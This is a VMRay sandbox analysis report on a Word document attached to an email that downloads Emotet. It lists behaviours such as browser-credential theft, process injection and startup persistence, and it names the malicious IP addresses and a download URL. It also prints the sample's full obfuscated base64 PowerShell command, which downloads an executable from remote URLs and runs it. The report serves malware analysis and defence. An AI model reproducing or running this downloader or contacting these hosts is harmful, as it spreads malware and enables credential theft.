Word Doc in Attached Email Downloads Emotet | VTI by Category
Try VMRay Analyzer
VTI Information
VTI Score
100 / 100
VTI Database Version 2.6
VTI Rule Match Count 31
VTI Rule Type Documents
Detected Threats
Arrow Anti Analysis
Arrow
Try to detect debugger
Check via API "IsDebuggerPresent".
Arrow Browser
Arrow
Read data related to browsing history
Read the browsing history for "Microsoft Internet Explorer".
Arrow
Read data related to saved browser credentials
Read saved credentials for "Google Chrome".
Arrow Device
Arrow
Monitor keyboard input
Read the current state of the "VK_CANCEL" by API.
Arrow Information Stealing
Arrow
Read browser data
Possibly trying to readout browser credentials.
Arrow Injection
Arrow
Write into memory of a process running from a created or modified executable
"c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe" modifies memory of "c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe"
Arrow
Modify control flow of a process running from a created or modified executable
"c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe" alters context of "c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe"
Arrow Network
Arrow
Download data
Url "65.99.230.27".
Url "185.82.23.28".
Url "kerineal.com/simplyelegant/hQoBm/".
Arrow
Perform DNS request
Resolve host name "kerineal.com".
Arrow
Connect to remote host
Outgoing TCP connection to host "184.168.152.148:80".
Arrow
Connect to HTTP server
Remote address "65.99.230.27".
Remote address "185.82.23.28".
Remote address "kerineal.com/simplyelegant/hQoBm/".
Arrow PE
Arrow
Execute dropped PE file
Execute dropped file "c:\users\atveydl98z\appdata\local\temp\38763.exe".
Arrow
Drop PE file
Drop file "c:\users\atveydl98z\appdata\local\temp\38763.exe".
Arrow Persistence
Arrow
Install system startup script or application
Add ""C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe"" to windows startup via registry.
Arrow Process
Arrow
Create process
Create process "powershell -e JAB7AHcAYABzAGAAYwBSAEkAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAG8AYgBqAGUAYwB0ACcALAAnAGUAdwAtACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACAAJwBsAGwAJwAsACcAUwAnACwAJwAuACcALAAnAGgAZQAnACwAJwBXAFMAYwByAGkAcAB0ACcAKQA7ACQAewBXAGUAQgBjAGwAYABpAGAARQBOAHQAfQAgAD0AIAAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAJwBuAGUAdwAtACcALAAnAG8AJwAsACcAYgAnACwAJwBqAGUAYwB0ACcAKQAgACgAIgB7ADQAfQB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBsAGkAZQAnACwAJwB0AGUAbQAuAE4AZQB0ACcALAAnAG4AdAAnACwAJwAuAFcAZQBiAEMAJwAsACcAUwB5AHMAJwApADsAJAB7AHIAYQBgAE4ARABPAE0AfQAgAD0AIAAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAYwB0ACcALAAnAGIAagBlACcALAAnAGUAdwAtAG8AJwAsACcAbgAnACkAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHIAYQBuAGQAbwAnACwAJwBtACcAKQA7ACQAewB1AGAAUgBsAFMAfQAgAD0AIAAoACIAewAxADcAfQB7ADIAMQB9AHsAMQAxAH0AewAxADUAfQB7ADEAfQB7ADMAfQB7ADMAOAB9AHsAMwA5AH0AewAzADcAfQB7ADIAMgB9AHsAMQAwAH0AewA2AH0AewAzADEAfQB7ADAAfQB7ADMANAB9AHsAMQA2AH0AewAyADYAfQB7ADMAMAB9AHsAMgAwAH0AewAxADQAfQB7ADkAfQB7ADMANgB9AHsAMgAzAH0AewA4AH0AewAyADQAfQB7ADIANQB9AHsAMgA5AH0AewAyADgAfQB7ADEAMgB9AHsANQB9AHsAMgB9AHsAMQA5AH0AewAyADcAfQB7ADcAfQB7ADEAMwB9AHsANAB9AHsAMQA4AH0AewAzADMAfQB7ADMANQB9AHsAMwAyAH0AIgAgAC0AZgAgACcAZQBhAHQAcwBwAGEAJwAsACcAaQBuAGUAJwAsACcAcwAuAGMAJwAsACcAYQBsAC4AYwBvAG0AJwAsACcAZwAnACwAJwBsAHUAJwAsACcAaAAnACwAJwByAGUAcwBzAC8AJwAsACcAZQBzAC4AbgBlACcALAAnAC8ALABoAHQAdABwACcALAAnACwAJwAsACcALwBrAGUAJwAsACcALwBiAG0AYQBzAHQAZQByAHAAJwAsACcARAAnACwAJwB5AHIAcgAnACwAJwByACcALAAnAC4AdQBrAC8AVgBRAC8ALABoAHQAdABwADoALwAvAHUAbQBlACcALAAnAGgAdAB0ACcALAAnAE4AJwAsACcAbwBtAC8AJwAsACcAbwBtAC8AJwAsACcAcAA6AC8AJwAsACcALwBoAFEAbwBCAG0ALwAnACwAJwAvAC8AbgB5AGUAcgBnACcALAAnAHQALwAnACwAJwBxAHEAcgAvACwAJwAsACcAeAAnACwAJwB3AG8AcgBkAHAAJwAsACcAcAA6AC8AJwAsACcAaAB0AHQAJwAsACcAeAAuAGMAJwAsACcAdAB0AHAAOgAvAC8AJwAsACcASgBGAGgALwAnACwAJwBuAGsAJwAsACcAbQAuAGMAbwAnACwAJwBHACcALAAnADoAJwAsACcAdAAnACwAJwAvAHMAJwAsACcAaQBtAHAAbAB5AGUAbABlAGcAYQBuACcAKQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbABpAHQAJwAsACcAUwBwACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBuAGAAQQBtAEUAfQAgAD0AIAAkAHsAcgBhAG4ARABgAE8ATQB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAJwAsACcAbgBlAHgAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGAAQQBUAEgAfQAgAD0AIAAkAHsARQBgAE4AdgA6AGAAVABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAUgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAGMATABJAGUAYABOAHQAfQAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAG4AbAAnACwAJwBEAG8AdwAnACwAJwBvAGEAZABGAGkAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AHUAYABSAEwAfQAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgBnACcALAAnAGkAJwAsACcAVABvAFMAdAByACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYABBAHQAaAB9ACkAOwAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwBTACcALAAnAHQAYQByAHQALQAnACwAJwBQAHIAbwBjAGUAcwBzACcAKQAgACQAewBQAEEAYABUAEgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBpAHQAZQAtAGgAbwBzAHQAJwAsACcAcgAnACwAJwB3ACcAKQAgACQAewBfAH0ALgAiAEUAeABDAGAAZQBgAFAAVABpAE8ATgAiAC4AIgBtAGUAcwBzAGAAQQBgAGcAZQAiADsAfQB9AA0ACgA=".
Create process "C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe".
Create process "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe".
Create process ""C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp"".
Create process ""C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp"".
Create process ""C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp"".
Arrow
Create system object
Create mutex with name "Global\.net clr networking".
Create mutex with name "MF6003E70".
Create mutex with name "Global\I40F77A1B".
Create mutex with name "Global\M40F77A1B".
Create mutex with name "M68B1B0D0".
Arrow VBA Macro
Arrow
Execute application
VBA.Shell$ bktLAfLdCk + gxNUmgtWxGM + NTmebYUL + aRwMduN + xpZSkkRz + ZvStsRF + PWwDgrB + bDPRdLpa + bNWzAbXfdBp + PHuvNFLBmA + zWtcLfDZ + umLbPFhprKh, 0
Arrow
Execute macro on specific worksheet event
Execute macro on "Activate Workbook" event.
- OS
- File System
- Hide Tracks
- Kernel
- Masquerade
- User
- YARA
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image